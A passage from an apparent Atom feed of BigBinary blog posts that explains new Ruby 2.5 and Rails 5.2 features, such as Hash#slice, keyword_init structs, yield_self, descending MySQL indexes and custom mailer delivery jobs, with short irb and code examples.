      <updated>2018-02-21T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-2-supports-specifying-default-value-for-a-class_attribute</id>
      <content type="html"><![CDATA[<p>It is very common to set a default value for a <code>class_attribute</code>.</p><p>Before Rails 5.2, to specify a default value for a <code>class_attribute</code>, we needed to write like this.</p><pre><code class="language-ruby">class ActivityLogger
  class_attribute :logger
  class_attribute :settings

  self.logger = Logger.new(STDOUT)
  self.settings = {}
end</code></pre><p>As we can see above, it requires additional keystrokes to set a default value for each <code>class_attribute</code>.</p><p>Rails 5.2 has added support for specifying a default value for a <code>class_attribute</code> using the <code>default</code> option.</p><pre><code class="language-ruby">class ActivityLogger
  class_attribute :logger, default: Logger.new(STDOUT)
  class_attribute :settings, default: {}
end</code></pre><p>This enhancement was introduced in this <a href="https://github.com/rails/rails/pull/29270">pull request</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.5 added Hash#slice method]]></title>
       <author><name>Amit Choudhary</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-5-added-hash-slice-method"/>
      <updated>2018-02-06T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-5-added-hash-slice-method</id>
      <content type="html"><![CDATA[<h4>Ruby 2.4</h4><p>Let's say we have a hash <code>{ id: 1, name: 'Ruby 2.5', description: 'BigBinary Blog' }</code> and we want to select the key value pairs having the keys <code>name</code> and <code>description</code>.</p><p>We can use the <a href="https://ruby-doc.org/core-2.4.2/Hash.html#method-i-select">Hash#select</a> method.</p><pre><code class="language-ruby">irb&gt; blog = { id: 1, name: 'Ruby 2.5', description: 'BigBinary Blog' }
  =&gt; {:id=&gt;1, :name=&gt;&quot;Ruby 2.5&quot;, :description=&gt;&quot;BigBinary Blog&quot;}
irb&gt; blog.select { |key, value| [:name, :description].include?(key) }
  =&gt; {:name=&gt;&quot;Ruby 2.5&quot;, :description=&gt;&quot;BigBinary Blog&quot;}</code></pre><p><a href="https://bugs.ruby-lang.org/users/5184">Matzbara Masanao</a> proposed a simple method to take care of this problem.</p><p>Some of the names proposed were <code>choice</code> and <code>pick</code>.</p><p><a href="https://twitter.com/yukihiro_matz">Matz</a> suggested the name <code>slice</code>, since this method is ActiveSupport compatible.</p><h4>Ruby 2.5.0</h4><pre><code class="language-ruby">irb&gt; blog = { id: 1, name: 'Ruby 2.5', description: 'BigBinary Blog' }
  =&gt; {:id=&gt;1, :name=&gt;&quot;Ruby 2.5&quot;, :description=&gt;&quot;BigBinary Blog&quot;}
irb&gt; blog.slice(:name, :description)
  =&gt; {:name=&gt;&quot;Ruby 2.5&quot;, :description=&gt;&quot;BigBinary Blog&quot;}</code></pre><p>So now we can use the simple <code>slice</code> method to select key value pairs with the specified keys from a hash.</p><p>Here is the relevant <a href="https://github.com/ruby/ruby/commit/6c50bdda0b">commit</a> and <a href="https://bugs.ruby-lang.org/issues/13563">discussion</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.5 allows creating structs with keyword arguments]]></title>
       <author><name>Prathamesh Sonpatki</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-5-allows-creating-structs-with-keyword-arguments"/>
      <updated>2018-01-16T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-5-allows-creating-structs-with-keyword-arguments</id>
      <content type="html"><![CDATA[<p>In Ruby, structs can be created using positional arguments.</p><pre><code class="language-ruby">Customer = Struct.new(:name, :email)
Customer.new(&quot;John&quot;, &quot;john@example.com&quot;)</code></pre><p>This approach works when the arguments list is short. When the arguments list grows, it gets harder to track which position maps to which value.</p><p>If we pass keyword arguments here, we won't get any error. But the values are not what we wanted.</p><pre><code class="language-ruby">Customer.new(name: &quot;John&quot;, email: &quot;john@example.com&quot;)
=&gt; #&lt;struct Customer name={:name=&gt;&quot;John&quot;, :email=&gt;&quot;john@example.com&quot;}, email=nil&gt;</code></pre><p>Ruby 2.5 introduced <a href="https://bugs.ruby-lang.org/issues/11925">creating structs using keyword arguments</a>. The relevant pull request is <a href="https://github.com/ruby/ruby/pull/1771/files">here</a>.</p><p>However, this introduces a problem. How do we indicate to <code>Struct</code> whether we want to pass arguments using positions or keywords?</p><p>Takashi Kokubun <a href="https://bugs.ruby-lang.org/issues/11925#journal-68208-private_notes">suggested</a> using <code>keyword_argument</code> as an identifier.</p><pre><code class="language-ruby">Customer = Struct.new(:name, :email, keyword_argument: true)
Customer.create(name: &quot;John&quot;, email: &quot;john@example.com&quot;)</code></pre><p>Matz <a href="https://bugs.ruby-lang.org/issues/11925#journal-68295-private_notes">suggested</a> changing the name to <code>keyword_init</code>.</p><p>So in Ruby 2.5 we can create structs using keywords as long as we pass <code>keyword_init: true</code>.</p><pre><code class="language-ruby">Customer = Struct.new(:name, :email, keyword_init: true)
Customer.new(name: &quot;John&quot;, email: &quot;john@example.com&quot;)
=&gt; #&lt;struct Customer name=&quot;John&quot;, email=&quot;john@example.com&quot;&gt;</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5.2 allows mailers to use custom Active Job class]]></title>
       <author><name>Prathamesh Sonpatki</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-2-allows-mailers-to-use-custom-active-job-class"/>
      <updated>2018-01-15T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-2-allows-mailers-to-use-custom-active-job-class</id>
      <content type="html"><![CDATA[<p>Rails allows sending emails asynchronously via Active Job.</p><pre><code class="language-ruby">Notifier.welcome(User.first).deliver_later</code></pre><p>It uses <code>ActionMailer::DeliveryJob</code> as the default job class to send emails. This class is <a href="https://github.com/rails/rails/blob/7b4132f4a28d1c264a972b95bf86bf6230869a40/actionmailer/lib/action_mailer/delivery_job.rb#L10">defined internally</a> by Rails.</p><p>The <code>DeliveryJob</code> defines the <code>handle_exception_with_mailer_class</code> method to handle exceptions and to do some housekeeping work.</p><pre><code class="language-ruby">def handle_exception_with_mailer_class(exception)
  if klass = mailer_class
    klass.handle_exception exception
  else
    raise exception
  end
end</code></pre><p>One might need more control over the job class, to retry the job under certain conditions or to add more logging around exceptions.</p><p>Before Rails 5.2, it was not possible to use a custom job class for this purpose.</p><p>Rails 5.2 has added a feature to <a href="https://github.com/rails/rails/pull/29457">configure the job class per mailer</a>.</p><pre><code class="language-ruby">class CustomNotifier &lt; ApplicationMailer
  self.delivery_job = CustomNotifierDeliveryJob
end</code></pre><p>By default, Rails will use the internal <code>DeliveryJob</code> class if the <code>delivery_job</code> configuration is not present in the mailer class.</p><p>Now, Rails will use <code>CustomNotifierDeliveryJob</code> for sending emails for the CustomNotifier mailer.</p><pre><code class="language-ruby">CustomNotifier.welcome(User.first).deliver_later</code></pre><p>As mentioned above, <code>CustomNotifierDeliveryJob</code> can be further configured for logging, exception handling and reporting.</p><p>By default, <code>deliver_later</code> will pass the following arguments to the <code>perform</code> method of the <code>CustomNotifierDeliveryJob</code>.</p><ul><li>mailer class name</li><li>mailer method 
name</li><li>mail delivery method</li><li>original arguments with which the mail is to be sent</li></ul><pre><code class="language-ruby">class CustomNotifierDeliveryJob &lt; ApplicationJob
  rescue_from StandardError, with: :handle_exception_with_mailer_class

  retry_on CustomNotifierException

  discard_on ActiveJob::DeserializationError

  def perform(mailer, mail_method, delivery_method, *args)
    logger.log &quot;Mail delivery started&quot;

    klass = mailer.constantize
    klass.public_send(mail_method, *args).send(delivery_method)

    logger.log &quot;Mail delivery completed&quot;
  end

  def handle_exception_with_mailer_class(exception)
    if klass = mailer_class
      klass.handle_exception exception
    else
      raise exception
    end
  end
end</code></pre><p>We can also simply inherit from <code>ActionMailer::DeliveryJob</code> and override the retry logic.</p><pre><code class="language-ruby">class CustomNotifierDeliveryJob &lt; ActionMailer::DeliveryJob
  retry_on CustomNotifierException
end</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5.2 supports descending indexes for MySQL]]></title>
       <author><name>Chirag Shah</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-2-supports-descending-indexes-for-mysql"/>
      <updated>2018-01-10T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-2-supports-descending-indexes-for-mysql</id>
      <content type="html"><![CDATA[<p>An index is used to speed up the performance of queries on a database.</p><p>Rails allows us to create an index on a database column by means of a migration. By default, the sort order for the index is ascending.</p><p>But consider the case where we are fetching reports from the database. And while querying the database, we always want to get the latest report. In this case, it is efficient to specify the sort order for the index to be descending.</p><p>We can specify the sort order by adding an index to the required columns in a migration.</p><pre><code class="language-ruby">add_index :reports, [:user_id, :name], order: { user_id: :asc, name: :desc }</code></pre><h2>PostgreSQL</h2><p>If our Rails application is using a postgres database, after running the above migration we can verify that the sort order was added in schema.rb.</p><pre><code class="language-ruby">create_table &quot;reports&quot;, force: :cascade do |t|
  t.string &quot;name&quot;
  t.integer &quot;user_id&quot;
  t.datetime &quot;created_at&quot;, null: false
  t.datetime &quot;updated_at&quot;, null: false
  t.index [&quot;user_id&quot;, &quot;name&quot;], name: &quot;index_reports_on_user_id_and_name&quot;, order: { name: :desc }
end</code></pre><p>Here, the index for <code>name</code> has a descending sort order. 
Since the default is ascending, the sort order for <code>user_id</code> is not specified in schema.rb.</p><h2>MySQL &lt; 8.0.1</h2><p>For <strong>MySQL &lt; 8.0.1</strong>, running the above migration would generate the following schema.rb.</p><pre><code class="language-ruby">create_table &quot;reports&quot;, force: :cascade do |t|
  t.string &quot;name&quot;
  t.integer &quot;user_id&quot;
  t.datetime &quot;created_at&quot;, null: false
  t.datetime &quot;updated_at&quot;, null: false
  t.index [&quot;user_id&quot;, &quot;name&quot;], name: &quot;index_reports_on_user_id_and_name&quot;
end</code></pre><p>As we can see, although the migration runs successfully, it ignores the sort order and the default ascending order is used.</p><h2>Rails 5.2 and MySQL &gt; 8.0.1</h2><p><strong>MySQL 8.0.1</strong> <a href="https://dev.mysql.com/doc/relnotes/mysql/8.0/en/news-8-0-1.html#mysqld-8-0-1-optimizer">added support</a> for descending indexes.</p><p>The Rails community was quick <a href="https://github.com/rails/rails/pull/28773">to integrate it as well</a>. So now in Rails 5.2, we can add descending indexes for MySQL databases.</p><p>Running the above migration would lead to the same output in the schema.rb file as that of the postgres one.</p><pre><code class="language-ruby">create_table &quot;reports&quot;, force: :cascade do |t|
  t.string &quot;name&quot;
  t.integer &quot;user_id&quot;
  t.datetime &quot;created_at&quot;, null: false
  t.datetime &quot;updated_at&quot;, null: false
  t.index [&quot;user_id&quot;, &quot;name&quot;], name: &quot;index_reports_on_user_id_and_name&quot;, order: { name: :desc }
end</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.5 adds Hash#transform_keys method]]></title>
       <author><name>Prathamesh Sonpatki</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-5-adds-hash-transform_keys-method"/>
      <updated>2018-01-09T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-5-adds-hash-transform_keys-method</id>
      <content type="html"><![CDATA[<p>Ruby 2.4 added the <a href="https://bigbinary.com/blog/ruby-2-4-added-hash-transform-values-and-its-destructive-version-from-active-support">Hash#transform_values</a> method to transform the values of a hash.</p><p>In Ruby 2.5, a similar method, <a href="https://bugs.ruby-lang.org/issues/13583">Hash#transform_keys</a>, is added for transforming the keys of a hash.</p><pre><code class="language-ruby">&gt;&gt; h = { name: &quot;John&quot;, email: &quot;john@example.com&quot; }
=&gt; {:name=&gt;&quot;John&quot;, :email=&gt;&quot;john@example.com&quot;}
&gt;&gt; h.transform_keys { |k| k.to_s }
=&gt; {&quot;name&quot;=&gt;&quot;John&quot;, &quot;email&quot;=&gt;&quot;john@example.com&quot;}</code></pre><p>The bang sibling of this method, <code>Hash#transform_keys!</code>, is also added, which changes the hash in place.</p><p>These two methods are already present in <a href="http://guides.rubyonrails.org/active_support_core_extensions.html#transform-keys-and-transform-keys-bang">Active Support from Rails</a> and are now natively supported in Ruby.</p><p>Rails master already supports <a href="https://github.com/rails/rails/commit/f213e926892">using the native methods</a> if the Ruby version supports them.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5.2 allows passing request params to Action Mailer previews]]></title>
       <author><name>Prathamesh Sonpatki</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-2-allows-passing-request-params-to-action-mailer-previews"/>
      <updated>2018-01-08T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-2-allows-passing-request-params-to-action-mailer-previews</id>
      <content type="html"><![CDATA[<p>Rails has an inbuilt feature to preview emails using <a href="http://guides.rubyonrails.org/action_mailer_basics.html#previewing-emails">Action Mailer previews</a>.</p><p>A preview mailer can be set up as shown here.</p><pre><code class="language-ruby">class NotificationMailer &lt; ApplicationMailer
  def notify(email:, body:)
    user = User.find_by(email: email)

    mail(to: user.email, body: body)
  end
end

class NotificationMailerPreview &lt; ActionMailer::Preview
  def notify
    NotificationMailer.notify(email: User.first.email, body: &quot;Hi there!&quot;)
  end
end</code></pre><p>This will work as expected. But our email template is displayed differently based on the user's role. To test this, we need to update the notify method and then check the updated preview.</p><p>What if we could just pass the email in the preview URL?</p><pre><code class="language-plaintext">http://localhost:3000/rails/mailers/notification/notify?email=superadmin@example.com</code></pre><p>In Rails 5.2, we can pass the params directly in the URL, and the <a href="https://github.com/rails/rails/pull/28244">params will be available to the preview mailers</a>.</p><p>Our code can be changed as follows to use the params.</p><pre><code class="language-ruby">class NotificationMailerPreview &lt; ActionMailer::Preview
  def notify
    email = params[:email] || User.first.email

    NotificationMailer.notify(email: email, body: &quot;Hi there!&quot;)
  end
end</code></pre><p>This allows us to test our mailers with dynamic input as per the requirements.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.5 enumerable predicates accept pattern argument]]></title>
       <author><name>Prathamesh Sonpatki</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-5-enumerable-predicates-accept-pattern-argument"/>
      <updated>2018-01-02T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-5-enumerable-predicates-accept-pattern-argument</id>
      <content type="html"><![CDATA[<p>Ruby 2.5.0 was recently <a href="https://www.ruby-lang.org/en/news/2017/12/25/ruby-2-5-0-released/">released</a>.</p><p>Ruby has sequence predicates such as <code>all?</code>, <code>none?</code>, <code>one?</code> and <code>any?</code>, which take a block and evaluate it by passing every element of the sequence to it.</p><pre><code class="language-ruby">if queries.any? { |sql| /LEFT OUTER JOIN/i =~ sql }
  logger.log &quot;Left outer join detected&quot;
end</code></pre><p>Ruby 2.5 allows a shorthand for this by <a href="https://bugs.ruby-lang.org/issues/11286">passing a pattern argument</a>. Internally, the <code>case equality operator (===)</code> is used against every element of the sequence and the pattern argument.</p><pre><code class="language-ruby">if queries.any?(/LEFT OUTER JOIN/i)
  logger.log &quot;Left outer join detected&quot;
end

# Translates to:
queries.any? { |sql| /LEFT OUTER JOIN/i === sql }</code></pre><p>This allows us to write concise, shorthand expressions where the block is used only for a comparison. This feature is applicable to the <code>all?</code>, <code>none?</code>, <code>one?</code> and <code>any?</code> methods.</p><h3>Similarities with Enumerable#grep</h3><p>This feature is based on how <code>Enumerable#grep</code> works. <code>grep</code> returns an array of every element in the sequence for which the <code>case equality operator (===)</code> returns true when the pattern is applied. In this case, <code>all?</code> and friends return true or false.</p><p>There is a <a href="https://bugs.ruby-lang.org/issues/14197">proposal</a> to add it for <code>select</code> and <code>reject</code> as well.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5.2 adds bootsnap to the app to speed up boot time]]></title>
       <author><name>Prathamesh Sonpatki</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-2-adds-bootsnap-to-the-app-to-speed-up-boot-time"/>
      <updated>2018-01-01T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-2-adds-bootsnap-to-the-app-to-speed-up-boot-time</id>
       <content type="html"><![CDATA[<p>Rails 5.2 beta 1 was recently <a href="http://weblog.rubyonrails.org/2017/11/27/Rails-5-2-Active-Storage-Redis-Cache-Store-HTTP2-Early-Hints-Credentials/">released</a>.</p><p>If we generate a new Rails app using Rails 5.2, we will see the bootsnap gem in the Gemfile. <a href="https://github.com/Shopify/bootsnap">bootsnap</a> helps in reducing the boot time of the app by caching expensive computations.</p><p>In a new Rails 5.2 app, <code>boot.rb</code> will contain the following content:</p><pre><code class="language-ruby">ENV['BUNDLE_GEMFILE'] ||= File.expand_path('../Gemfile', __dir__)

require 'bundler/setup' # Set up gems listed in the Gemfile.
require 'bootsnap/setup' # Speed up boot time by caching expensive operations.

if %w[s server c console].any? { |a| ARGV.include?(a) }
  puts &quot;=&gt; Booting Rails&quot;
end</code></pre><p>This sets up bootsnap to start in all environments. We can toggle it per environment as required.</p><p>This works out of the box and we don't have to do anything for a new app.</p><p>If we are upgrading an older app which already has bootsnap, then we need to make sure that we are using bootsnap &gt;= 1.1.0, because new Rails apps ship with that version constraint.</p><p>If the app doesn't contain the bootsnap gem already, then we will need to add it manually, since the <code>rails app:update</code> task adds the <code>bootsnap/setup</code> line to <code>boot.rb</code> regardless of its presence in the Gemfile.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.5 requires pp by default]]></title>
       <author><name>Prathamesh Sonpatki</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-5-requires-pp-by-default"/>
      <updated>2017-12-20T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-5-requires-pp-by-default</id>
       <content type="html"><![CDATA[<p>Ruby 2.5.0-preview1 was recently <a href="https://www.ruby-lang.org/en/news/2017/10/10/ruby-2-5-0-preview1-released/">released</a>.</p><p>Ruby allows pretty printing of objects using the <a href="http://ruby-doc.org/stdlib-2.4.0/libdoc/pp/rdoc/PP.html">pp method</a>.</p><p>Before Ruby 2.5, we had to require PP explicitly before using it. Even the official documentation states that &quot;All examples assume you have loaded the PP class with require 'pp'&quot;.</p><pre><code class="language-ruby">&gt;&gt; months = %w(January February March)
=&gt; [&quot;January&quot;, &quot;February&quot;, &quot;March&quot;]
&gt;&gt; pp months
NoMethodError: undefined method `pp' for main:Object
Did you mean?  p
from (irb):5
from /Users/prathamesh/.rbenv/versions/2.4.1/bin/irb:11:
&gt;&gt; require 'pp'
=&gt; true
&gt;&gt; pp months
[&quot;January&quot;, &quot;February&quot;, &quot;March&quot;]
=&gt; [&quot;January&quot;, &quot;February&quot;, &quot;March&quot;]</code></pre><p>In Ruby 2.5, we don't need to require pp. It <a href="https://bugs.ruby-lang.org/issues/14123">gets required by default</a>. We can use it directly.</p><pre><code class="language-ruby">&gt;&gt; months = %w(January February March)
=&gt; [&quot;January&quot;, &quot;February&quot;, &quot;March&quot;]
&gt;&gt; pp months
[&quot;January&quot;, &quot;February&quot;, &quot;March&quot;]
=&gt; [&quot;January&quot;, &quot;February&quot;, &quot;March&quot;]</code></pre><p>This feature was added after Ruby 2.5.0 preview 1 was released, so it's not present in the preview. It's present in <a href="https://github.com/ruby/ruby">Ruby trunk</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Array#prepend and Array#append in Ruby 2.5]]></title>
       <author><name>Prathamesh Sonpatki</name></author>
      <link href="https://www.bigbinary.com/blog/array-prepend-and-array-append-in-ruby-2-5"/>
      <updated>2017-12-19T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/array-prepend-and-array-append-in-ruby-2-5</id>
       <content type="html"><![CDATA[<p>Ruby has <code>Array#unshift</code> to prepend an element to the start of an array and <code>Array#push</code> to append an element to the end of an array.</p><p>The names of these methods are not very intuitive. Active Support from Rails already has aliases for <a href="https://github.com/rails/rails/blob/e48704db8e6021b690b1fe2b362c7cb2e624e173/activesupport/lib/active_support/core_ext/array/prepend_and_append.rb">the unshift and push methods</a>, namely <code>prepend</code> and <code>append</code>.</p><p>In Ruby 2.5, these methods <a href="https://bugs.ruby-lang.org/issues/12746">are added to the Ruby language itself</a>.</p><pre><code class="language-ruby">&gt;&gt; a = [&quot;hello&quot;]
=&gt; [&quot;hello&quot;]
&gt;&gt; a.append &quot;world&quot;
=&gt; [&quot;hello&quot;, &quot;world&quot;]
&gt;&gt; a.prepend &quot;Hey&quot;
=&gt; [&quot;Hey&quot;, &quot;hello&quot;, &quot;world&quot;]</code></pre><p>They are implemented as aliases of the original <code>unshift</code> and <code>push</code> methods, so there is no change in behavior.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.5 added yield_self]]></title>
       <author><name>Vijay Kumar Agrawal</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-5-added-yield_self"/>
      <updated>2017-12-12T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-5-added-yield_self</id>
       <content type="html"><![CDATA[<p>Ruby 2.5 added a new method named <a href="https://bugs.ruby-lang.org/issues/6721">yield_self</a>. It yields the receiver to the given block and returns the output of the last statement in the block.</p><pre><code class="language-ruby">irb&gt; &quot;Hello&quot;.yield_self { |str| str + &quot; World&quot; }
  =&gt; &quot;Hello World&quot;</code></pre><h4>How is it different from <code>try</code> in Rails?</h4><p>Without a method argument, <a href="https://apidock.com/rails/v4.2.7/Object/try">try</a> behaves similarly to <code>yield_self</code>. It yields to the given block unless the receiver is nil, and returns the output of the last statement in the block.</p><pre><code class="language-ruby">irb&gt; &quot;Hello&quot;.try { |str| str + &quot; World&quot; }
  =&gt; &quot;Hello World&quot;</code></pre><p>A couple of differences to note: <code>try</code> is not part of <code>Ruby</code> but of <code>Rails</code>. Also, <code>try</code>'s main purpose is protection against <code>nil</code>, hence it doesn't execute the block if the receiver is <code>nil</code>.</p><pre><code class="language-ruby">irb&gt; nil.yield_self { |obj| &quot;Hello World&quot; }
  =&gt; &quot;Hello World&quot;
irb&gt; nil.try { |obj| &quot;Hello World&quot; }
  =&gt; nil</code></pre><h4>What about <code>tap</code>?</h4><p><code>tap</code> is also similar to <code>yield_self</code>, and it's part of Ruby itself. The only difference is the value that is returned. <code>tap</code> returns the receiver itself, while <code>yield_self</code> returns the output of the block.</p><pre><code class="language-ruby">irb&gt; &quot;Hello&quot;.yield_self { |str| str + &quot; World&quot; }
  =&gt; &quot;Hello World&quot;
irb&gt; &quot;Hello&quot;.tap { |str| str + &quot; World&quot; }
  =&gt; &quot;Hello&quot;</code></pre><p>Overall, <code>yield_self</code> improves readability of the code by promoting chaining over nested function calls. Here is an example of both styles.</p><pre><code class="language-ruby">irb&gt; add_greeting = -&gt; (str) { &quot;HELLO &quot; + str }
irb&gt; to_upper = -&gt; (str) { str.upcase }

# with the new `yield_self`
irb&gt; &quot;world&quot;.yield_self(&amp;to_upper)
            .yield_self(&amp;add_greeting)
  =&gt; &quot;HELLO WORLD&quot;

# nested function calls
irb&gt; add_greeting.call(to_upper.call(&quot;world&quot;))
  =&gt; &quot;HELLO WORLD&quot;</code></pre><p><code>yield_self</code> is part of <code>Kernel</code> and hence is available to all objects.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5.2 fetch_values for HashWithIndifferentAccess]]></title>
       <author><name>Mohit Natoo</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-2-implements-fetch_values-for-hashwithindifferentaccess"/>
      <updated>2017-12-06T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-2-implements-fetch_values-for-hashwithindifferentaccess</id>
       <content type="html"><![CDATA[<p>Ruby 2.3 added the <a href="https://bugs.ruby-lang.org/issues/10017">fetch_values method to Hash</a>.</p><p>By using <code>fetch_values</code> we are able to get the values for multiple keys in a hash.</p><pre><code class="language-ruby">capitals = { usa: &quot;Washington DC&quot;,
             china: &quot;Beijing&quot;,
             india: &quot;New Delhi&quot;,
             australia: &quot;Canberra&quot; }

capitals.fetch_values(:usa, :india)
#=&gt; [&quot;Washington DC&quot;, &quot;New Delhi&quot;]

capitals.fetch_values(:usa, :spain) { |country| &quot;N/A&quot; }
#=&gt; [&quot;Washington DC&quot;, &quot;N/A&quot;]</code></pre><p>Rails 5.2 introduces the <code>fetch_values</code> method <a href="https://github.com/rails/rails/pull/28316">on HashWithIndifferentAccess</a>. Hence we'll be able to fetch the values of multiple keys on any instance of the HashWithIndifferentAccess class.</p><pre><code class="language-ruby">capitals = HashWithIndifferentAccess.new
capitals[:usa] = &quot;Washington DC&quot;
capitals[:china] = &quot;Beijing&quot;

capitals.fetch_values(&quot;usa&quot;, &quot;china&quot;)
#=&gt; [&quot;Washington DC&quot;, &quot;Beijing&quot;]

capitals.fetch_values(&quot;usa&quot;, &quot;spain&quot;) { |country| &quot;N/A&quot; }
#=&gt; [&quot;Washington DC&quot;, &quot;N/A&quot;]</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.5 added delete_prefix and delete_suffix methods]]></title>
       <author><name>Amit Choudhary</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-5-added-delete_prefix-and-delete_suffix-methods"/>
      <updated>2017-11-28T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-5-added-delete_prefix-and-delete_suffix-methods</id>
       <content type="html"><![CDATA[<h4>Ruby 2.4</h4><p>Let's say that we have a string <code>Projects::CategoriesController</code> and we want to remove <code>Controller</code>. We can use the <a href="https://ruby-doc.org/core-2.4.2/String.html#method-i-chomp">chomp</a> method.</p><pre><code class="language-ruby">irb&gt; &quot;Projects::CategoriesController&quot;.chomp(&quot;Controller&quot;)
=&gt; &quot;Projects::Categories&quot;</code></pre><p>However, if we want to remove <code>Projects::</code> from the string, then there is no counterpart to <code>chomp</code>. We need to resort to <a href="https://ruby-doc.org/core-2.4.2/String.html#sub-method">sub</a>.</p><pre><code class="language-ruby">irb&gt; &quot;Projects::CategoriesController&quot;.sub(/Projects::/, '')
=&gt; &quot;CategoriesController&quot;</code></pre><p><a href="https://bugs.ruby-lang.org/users/6938">Naotoshi Seo</a> did not like using a regular expression for such a simple task. He proposed that Ruby should have a method for taking care of such tasks.</p><p>Some of the names proposed were <code>remove_prefix</code>, <code>deprefix</code>, <code>lchomp</code> and <code>head_chomp</code>.</p><p><a href="https://twitter.com/yukihiro_matz">Matz</a> suggested the name <code>delete_prefix</code>, and this method was born.</p><h4>Ruby 2.5.0-preview1</h4><pre><code class="language-ruby">irb&gt; &quot;Projects::CategoriesController&quot;.delete_prefix(&quot;Projects::&quot;)
=&gt; &quot;CategoriesController&quot;</code></pre><p>Now in order to delete a prefix we could use <code>delete_prefix</code>, but to delete a suffix we would still have to use <code>chomp</code>. This did not feel right, so for symmetry <code>delete_suffix</code> was added.</p><pre><code class="language-ruby">irb&gt; &quot;Projects::CategoriesController&quot;.delete_suffix(&quot;Controller&quot;)
=&gt; &quot;Projects::Categories&quot;</code></pre><p>Read up on <a href="https://bugs.ruby-lang.org/issues/12694">this discussion</a> to learn more about how Elixir, Go, Python, and PHP deal with similar requirements.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.5 introduces Dir.children and Dir.each_child]]></title>
       <author><name>Mohit Natoo</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2_5-introduces-dir-children-and-dir-each_child"/>
      <updated>2017-11-21T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2_5-introduces-dir-children-and-dir-each_child</id>
       <content type="html"><![CDATA[<p><a href="https://ruby-doc.org/core-2.4.2/Dir.html#entries-method">Dir.entries</a> is a method present in Ruby 2.4. It returns the output of the shell command <code>ls -a</code> in an array.</p><pre><code class="language-ruby">&gt; Dir.entries(&quot;/Users/john/Desktop/test&quot;)
&gt; =&gt; [&quot;.&quot;, &quot;..&quot;, &quot;.config&quot;, &quot;program.rb&quot;, &quot;group.txt&quot;]
&gt;</code></pre><p>We also have the method <a href="https://ruby-doc.org/core-2.4.2/Dir.html#foreach-method">Dir.foreach</a>, which iterates and yields each value from the output of the <code>ls -a</code> command to the block.</p><pre><code class="language-ruby">&gt; Dir.foreach(&quot;/Users/john/Desktop/test&quot;) { |child| puts child }
&gt; .
&gt; ..
&gt; .config
&gt; program.rb
&gt; group.txt
&gt; test2
&gt;</code></pre><p>We can see that the output includes the entries for the current directory and the parent directory, which are <code>&quot;.&quot;</code> and <code>&quot;..&quot;</code>.</p><p>When we want access only to the children files and directories, we do not need the <code>[&quot;.&quot;, &quot;..&quot;]</code> subarray.</p><p>This is a very common use case, and we'd probably have to do something like <code>Dir.entries(path) - [&quot;.&quot;, &quot;..&quot;]</code> to achieve the desired output.</p><p>To overcome such issues, <a href="https://bugs.ruby-lang.org/issues/11302">Ruby 2.5 introduced Dir.children</a>. It returns the output of the <code>ls -a</code> command without the entries for the current and parent directories.</p><pre><code class="language-ruby">&gt; Dir.children(&quot;/Users/mohitnatoo/Desktop/test&quot;)
&gt; =&gt; [&quot;.config&quot;, &quot;program.rb&quot;, &quot;group.txt&quot;]
&gt;</code></pre><p>Additionally, we can use the <code>Dir.each_child</code> method to avoid yielding the current and parent directory entries while iterating.</p><pre><code class="language-ruby">&gt; Dir.each_child(&quot;/Users/mohitnatoo/Desktop/test&quot;) { |child| puts child }
&gt; .config
&gt; program.rb
&gt; group.txt
&gt; test2
&gt;</code></pre><p>As noted in the <a href="https://bugs.ruby-lang.org/issues/11302">discussion</a>, the names were chosen to match the existing methods <a href="https://ruby-doc.org/stdlib-2.4.2/libdoc/pathname/rdoc/Pathname.html#method-i-children">Pathname#children</a> and <a href="https://ruby-doc.org/core-2.4.2/Dir.html#foreach-method">Pathname#each_child</a>.</p><p>These additions seem like simple features, yet the issue was posted more than two years ago.</p>]]></content>
    </entry><entry>
        <title><![CDATA[Higher Order Component to render a spinner in React Native]]></title>
       <author><name>Chirag Shah</name></author>
      <link href="https://www.bigbinary.com/blog/higher-order-component-for-rendering-spinner-in-react-native-app"/>
      <updated>2017-11-15T12:00:00+00:00</updated>
